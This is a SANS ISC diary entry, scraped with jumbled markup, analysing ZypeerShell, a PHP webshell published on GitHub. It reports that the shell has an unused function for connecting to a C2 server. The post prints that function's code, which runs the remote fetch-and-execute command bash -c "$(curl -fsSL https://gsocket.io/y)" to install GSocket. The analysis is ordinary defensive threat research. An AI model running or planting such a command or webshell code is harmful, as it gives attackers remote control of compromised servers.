Webshells have been popular for a long time. We already covered this topic across multiple diaries[1<\/a>][2<\/a>]. I spent some time to track them[3<\/a>] and slighly paid less attention to them but today I found another one. It seems to be a new player (pushed on Github two months ago).\u00a0<\/p>\n The webshell is called\u00a0ZypeerShell[4<\/a>] and pretend to be “The most powerful, undetectable, and feature-rich PHP webshell available on GitHub.”. The shell is classic and provides most of the expected features for such tool:<\/p>\n I won’t review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. By example, the function zypeergsdeploy() helps to connect to a C2 server through GSocket<\/p>\n This function is never called!<\/p>\n Note that the Github repository contains a version obfusctated with Fortress Layer, a\u00a0multi-layer loader with integrity checks. Zypeer is also referenced as a red-team tool on a Telegram channel:<\/p>\n [1]\u00a0https:\/\/isc.sans.edu\/diary\/Webshells+Webshells+everywhere\/28106<\/a> Xavier Mertens (@xme)<\/b> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n \t![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/isc-20260622-1.png?ssl=1\")
<\/p>\n\nfunction zypeergsdeploy() {\n zypeerhead();\n\n echo '<div class=\"header\"><center><p><div class=\"txtfont_header\">| GSocket Deploy Tool |<\/div><\/p><\/center><br>';\n\n echo '<div style=\"text-align:center;max-width:800px;margin:20px auto;color:#ccc;\">';\n echo 'This tool runs the official GSocket installation command:<br>';\n echo '<code style=\"background:#222;padding:8px 12px;font-size:15px;\">bash -c \"$(curl -fsSL https:\/\/gsocket.io\/y)\"<\/code><br><br>';\n echo 'After installation, it will show a secret token and connection command (like gs-netcat -s \"XXXX\" -i).<br>';\n echo 'Click \"Run\" below to execute it directly.';\n echo '<\/div><br><hr><br>';\n\n if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') {\n\u00a0 [...]\n<\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/isc-20260622-2.png?ssl=1\")
???????<\/p>\n
\n[2]\u00a0https:\/\/isc.sans.edu\/diary\/Webshell+looking+for+interesting+files\/23567<\/a>
\n[3]\u00a0https:\/\/owasp.org\/www-chapter-belgium\/assets\/2017\/2017-05-29\/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf???????<\/a>
\n[4]\u00a0https:\/\/github.com\/sagsooz\/ZypeerShell???????<\/a><\/p>\n
\nXameco
\nSenior ISC Handler – Freelance Cyber Security Consultant
\nPGP Key<\/a><\/p>\n
\n
<\/BR><\/p>\n